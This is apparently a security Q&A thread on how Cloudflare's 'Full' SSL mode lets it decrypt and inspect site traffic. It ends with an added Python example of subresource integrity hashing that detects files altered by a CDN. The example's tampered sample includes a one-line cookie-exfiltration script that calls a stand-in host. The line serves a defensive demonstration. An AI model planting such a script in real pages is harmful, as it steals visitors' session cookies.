We have Cloudflare in our production server and the encryption level is full, not flexible. This webpage said Cloudflare can decrypt the request. But we didn't give our server's private key to Cloudflare. How is this even possible? Does this mean anyone can decrypt the request without the target's private key?
2 Answers
One of the ways you use cloudflare is by setting the NS records for your domain to cloudflare's name servers which in turn resolve www.mydomain.com to their IP addresses. This means that when you go to www.mydomain.com setup with cloudflare, it hits one of their servers. The SSL certificate for that domain is not yours, it's theirs. Check the SSL certificate for your website, you'll see that it was issued to something.cloudflaressl.com and your domain is just one of the many in the Subject Alternative Name.
The "Full SSL" setup just means that all client traffic to cloudflare is over SSL (using their certificate), and all traffic between cloudflare and your actual server is over SSL as well (using a certificate matching your server name).
As you can see, cloudflare by definition decrypts all traffic for your website but it can do so because cloudflare technically is your website. Your actual server is just something cloudflare grabs data from when it doesn't have it cached. If you think about it, how else would it cache anything?
There are a number of different ways you can configure cloudflare:
- You can set cloudflare as your DNS provider; most CAs consider proof of DNS control as valid proof of domain control. This allows cloudflare to create a valid DV certificate with your domain name.
- You can give cloudflare your private key; this allows you to use an OV or EV certificate.
- In higher-level plans, you can use keyless SSL. This allows you to use OV and EV without surrendering your keys.
In all cases, yes, cloudflare can intercept and modify any data that passes through it. This is necessary because the main way Cloudflare works is as an edge caching layer, web application firewall, and captcha. All these capabilities require them to be able to see the content of requests as they come in and/or modify your pages.
There are a number of ways you can limit the authority of a CDN provider like cloudflare. If you use cloudflare to serve static files, you can serve your main site directly and use subresource integrity or add your own encryption to prevent modifications of files served via cloudflare. If you use a native application as your client (e.g. an Android app), you could pin your site's certificate, or you could require an OV or EV certificate.
If you run your main domain via cloudflare, then cloudflare is effectively as powerful as your hosting provider.
Note that even with "keyless" SSL, you still have to allow them to MITM and read the connection. It just means they don't have access to the private key itself. – forest Dec 19 '17 at 04:13
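The second answer suggests subresource integrity (SRI) as a way to keep a CDN from silently modifying static files it serves. The following is an added example (not code from either answerer) showing how a site owner generates the `integrity` attribute at build time and how a browser-style check detects a tampered file. It assumes a constructed script body as the file; the `sri_hash`, `sri_matches` and `script_tag` names are the example's own.

```python
import base64
import hashlib
import hmac

# Hash algorithms the SRI specification accepts, with their relative strength.
SRI_ALGORITHMS = {"sha256": hashlib.sha256, "sha384": hashlib.sha384, "sha512": hashlib.sha512}
SRI_STRENGTH = {"sha256": 1, "sha384": 2, "sha512": 3}


def sri_hash(content: bytes, algorithm: str = "sha384") -> str:
    """Return the value of an HTML integrity attribute, e.g. 'sha384-<base64 digest>'.

    This is what a build step computes for every file that will be served
    from the CDN; the value is embedded in HTML served from the origin.
    """
    if algorithm not in SRI_ALGORITHMS:
        raise ValueError(f"unsupported SRI algorithm: {algorithm}")
    digest = SRI_ALGORITHMS[algorithm](content).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, content: bytes, algorithm: str = "sha384") -> str:
    """Render a <script> tag with integrity and crossorigin attributes (the
    crossorigin attribute is required for SRI on cross-origin resources)."""
    return (f'<script src="{src}" integrity="{sri_hash(content, algorithm)}" '
            f'crossorigin="anonymous"></script>')


def sri_matches(content: bytes, integrity: str) -> bool:
    """Check a fetched body against an integrity attribute the way a browser does.

    The attribute may list several space-separated hashes. Only hashes using
    the strongest algorithm present are considered, and the body is accepted
    if any of those matches. Tokens with unknown algorithms are ignored.
    Note: a browser with no usable token loads the resource unchecked; this
    helper instead fails closed, which is the safer choice for a server-side
    or CI verification step.
    """
    parsed = []
    for token in integrity.split():
        alg, _, rest = token.partition("-")
        b64 = rest.split("?", 1)[0]  # strip the optional ?options suffix
        if alg in SRI_STRENGTH:
            parsed.append((alg, b64))
    if not parsed:
        return False
    best = max(SRI_STRENGTH[alg] for alg, _ in parsed)
    best_alg = next(alg for alg, s in SRI_STRENGTH.items() if s == best)
    expected = sri_hash(content, best_alg).split("-", 1)[1]
    # Constant-time comparison is not strictly needed for public hashes,
    # but costs nothing and avoids habit-forming mistakes elsewhere.
    return any(hmac.compare_digest(expected, candidate) for _, candidate in parsed
               if SRI_STRENGTH[_] == best)


# Constructed sample: a script body as it would be published to the CDN,
# and a version that an intermediary has altered.
ORIGINAL_SCRIPT = b"window.appVersion = '1.0';\n"
TAMPERED_SCRIPT = b"window.appVersion = '1.0';\nnew Image().src = '//constructed.example/x?' + document.cookie;\n"


def demo() -> dict:
    """Return the outcome of checking the original and tampered bodies."""
    attr = sri_hash(ORIGINAL_SCRIPT)
    return {
        "integrity": attr,
        "original_ok": sri_matches(ORIGINAL_SCRIPT, attr),
        "tampered_ok": sri_matches(TAMPERED_SCRIPT, attr),
    }


if __name__ == "__main__":
    print(script_tag("https://cdn.example/app.js", ORIGINAL_SCRIPT))
    print(demo())
```

If the CDN (or anything between the CDN and the visitor) alters `app.js`, `sri_matches` returns `False` and a browser refuses to execute the file; the check only helps when the HTML carrying the attribute is served from a path the CDN cannot rewrite, which is why the answer pairs it with serving the main site directly.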